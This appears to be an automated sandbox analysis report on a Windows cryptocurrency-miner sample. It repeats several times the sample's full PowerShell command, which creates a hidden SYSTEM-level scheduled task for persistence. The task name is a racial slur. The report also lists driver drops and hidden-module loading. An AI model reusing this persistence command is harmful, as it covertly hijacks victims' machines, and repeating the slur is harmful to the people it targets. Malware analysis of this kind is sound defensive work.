                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.32403.24162.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: SecuriteInfo.com.Win64.Evo-gen.32403.24162.exeReversingLabs: Detection: 52%
                Source: SecuriteInfo.com.Win64.Evo-gen.32403.24162.exeVirustotal: Detection: 62%
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.32403.24162.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.32403.24162.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.32403.24162.exe C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.32403.24162.exe
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zgpcu#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'MINEINEYNIGGA' /tr '''C:\Program Files\MINA\m.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\MINA\m.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'MINEINEYNIGGA' -User 'System' -RunLevel 'Highest' -Force; }
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Program Files\MINA\m.exe C:\Program Files\MINA\m.exe
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zgpcu#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'MINEINEYNIGGA' /tr '''C:\Program Files\MINA\m.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\MINA\m.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'MINEINEYNIGGA' -User 'System' -RunLevel 'Highest' -Force; }
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Program Files\MINA\m.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#kbbksn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'MINEINEYNIGGA' /tr '''C:\Program Files\MINA\m.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\MINA\m.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'MINEINEYNIGGA' -User 'System' -RunLevel 'Highest' -Force; }
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Program Files\MINA\m.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                Source: unknownProcess created: C:\Program Files\MINA\m.exe C:\Program Files\MINA\m.exe
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zgpcu#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'MINEINEYNIGGA' /tr '''C:\Program Files\MINA\m.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\MINA\m.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'MINEINEYNIGGA' -User 'System' -RunLevel 'Highest' -Force; }
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.32403.24162.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zgpcu#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'MINEINEYNIGGA' /tr '''C:\Program Files\MINA\m.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\MINA\m.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'MINEINEYNIGGA' -User 'System' -RunLevel 'Highest' -Force; }Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.32403.24162.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\MINA\m.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zgpcu#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'MINEINEYNIGGA' /tr '''C:\Program Files\MINA\m.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\MINA\m.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'MINEINEYNIGGA' -User 'System' -RunLevel 'Highest' -Force; }Jump to behavior
                Source: C:\Program Files\MINA\m.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exeJump to behavior
                Source: C:\Program Files\MINA\m.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
                Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#kbbksn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'MINEINEYNIGGA' /tr '''C:\Program Files\MINA\m.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\MINA\m.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'MINEINEYNIGGA' -User 'System' -RunLevel 'Highest' -Force; }Jump to behavior
                Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\MINA\m.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zgpcu#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'MINEINEYNIGGA' /tr '''C:\Program Files\MINA\m.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\MINA\m.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'MINEINEYNIGGA' -User 'System' -RunLevel 'Highest' -Force; }Jump to behavior
                Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.32403.24162.exeDirectory created: C:\Program Files\MINAJump to behavior
                Source: C:\Program Files\MINA\m.exeDirectory created: C:\Program Files\Google\LibsJump to behavior
                Source: SecuriteInfo.com.Win64.Evo-gen.32403.24162.exeStatic PE information: Image base 0x140000000 > 0x60000000
                Source: SecuriteInfo.com.Win64.Evo-gen.32403.24162.exeStatic file information: File size 5827072 > 1048576
                Source: SecuriteInfo.com.Win64.Evo-gen.32403.24162.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x56de00
                Source: SecuriteInfo.com.Win64.Evo-gen.32403.24162.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: m.exe, 00000006.00000002.2224945388.00007FF7C880B000.00000004.00000001.01000000.00000008.sdmp

                Data Obfuscation

                barindex
                Suspicious powershell command line found
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zgpcu#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'MINEINEYNIGGA' /tr '''C:\Program Files\MINA\m.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\MINA\m.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'MINEINEYNIGGA' -User 'System' -RunLevel 'Highest' -Force; }
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zgpcu#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'MINEINEYNIGGA' /tr '''C:\Program Files\MINA\m.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\MINA\m.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'MINEINEYNIGGA' -User 'System' -RunLevel 'Highest' -Force; }
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#kbbksn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'MINEINEYNIGGA' /tr '''C:\Program Files\MINA\m.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\MINA\m.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'MINEINEYNIGGA' -User 'System' -RunLevel 'Highest' -Force; }
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zgpcu#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'MINEINEYNIGGA' /tr '''C:\Program Files\MINA\m.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\MINA\m.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'MINEINEYNIGGA' -User 'System' -RunLevel 'Highest' -Force; }
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.32403.24162.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zgpcu#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'MINEINEYNIGGA' /tr '''C:\Program Files\MINA\m.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\MINA\m.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'MINEINEYNIGGA' -User 'System' -RunLevel 'Highest' -Force; }Jump to behavior
                Source: C:\Program Files\MINA\m.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zgpcu#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'MINEINEYNIGGA' /tr '''C:\Program Files\MINA\m.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\MINA\m.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'MINEINEYNIGGA' -User 'System' -RunLevel 'Highest' -Force; }Jump to behavior
                Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#kbbksn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'MINEINEYNIGGA' /tr '''C:\Program Files\MINA\m.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\MINA\m.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'MINEINEYNIGGA' -User 'System' -RunLevel 'Highest' -Force; }Jump to behavior
                Source: C:\Program Files\MINA\m.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zgpcu#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'MINEINEYNIGGA' /tr '''C:\Program Files\MINA\m.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\MINA\m.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'MINEINEYNIGGA' -User 'System' -RunLevel 'Highest' -Force; }Jump to behavior
                Source: SecuriteInfo.com.Win64.Evo-gen.32403.24162.exeStatic PE information: section name: .xdata
                Source: m.exe.0.drStatic PE information: section name: .xdata
                Source: wbiwcikhpmwr.tmp.6.drStatic PE information: section name: _RANDOMX
                Source: wbiwcikhpmwr.tmp.6.drStatic PE information: section name: _TEXT_CN
                Source: wbiwcikhpmwr.tmp.6.drStatic PE information: section name: _TEXT_CN
                Source: wbiwcikhpmwr.tmp.6.drStatic PE information: section name: _RDATA
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848E1D2A5 pushad ; iretd 2_2_00007FF848E1D2A6
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848F37B9A push eax; ret 2_2_00007FF848F37BA9
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848F37BD3 push eax; ret 2_2_00007FF848F37BA9
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848F3754D push ebx; iretd 2_2_00007FF848F3756A
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848F300BD pushad ; iretd 2_2_00007FF848F300C1
                Source: C:\Windows\System32\conhost.exeCode function: 10_2_00007FF6B29925AC push rsi; ret 10_2_00007FF6B29925C6
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF848E0D2A5 pushad ; iretd 11_2_00007FF848E0D2A6
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF848F23A36 pushad ; ret 11_2_00007FF848F23AC9
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF848F23A79 pushad ; ret 11_2_00007FF848F23AC9
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF848F200BD pushad ; iretd 11_2_00007FF848F200C1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF848F22325 push eax; iretd 11_2_00007FF848F2233D

                Persistence and Installation Behavior

                barindex
                Sample is not signed and drops a device driver
                Source: C:\Program Files\MINA\m.exeFile created: C:\Program Files\Google\Libs\WR64.sysJump to behavior
                Source: C:\Program Files\MINA\m.exeFile created: C:\Windows\Temp\wbiwcikhpmwr.tmpJump to dropped file
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.32403.24162.exeFile created: C:\Program Files\MINA\m.exeJump to dropped file
                Source: C:\Program Files\MINA\m.exeFile created: C:\Program Files\Google\Libs\WR64.sysJump to dropped file
                Source: C:\Program Files\MINA\m.exeFile created: C:\Windows\Temp\wbiwcikhpmwr.tmpJump to dropped file

                Hooking and other Techniques for Hiding and Protection

                barindex
                Found hidden mapped module (file has been removed from disk)
                Source: C:\Program Files\MINA\m.exeModule Loaded: C:\WINDOWS\TEMP\WBIWCIKHPMWR.TMP
                Source: C:\Program Files\MINA\m.exeModule Loaded: C:\WINDOWS\TEMP\WBIWCIKHPMWR.TMP
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
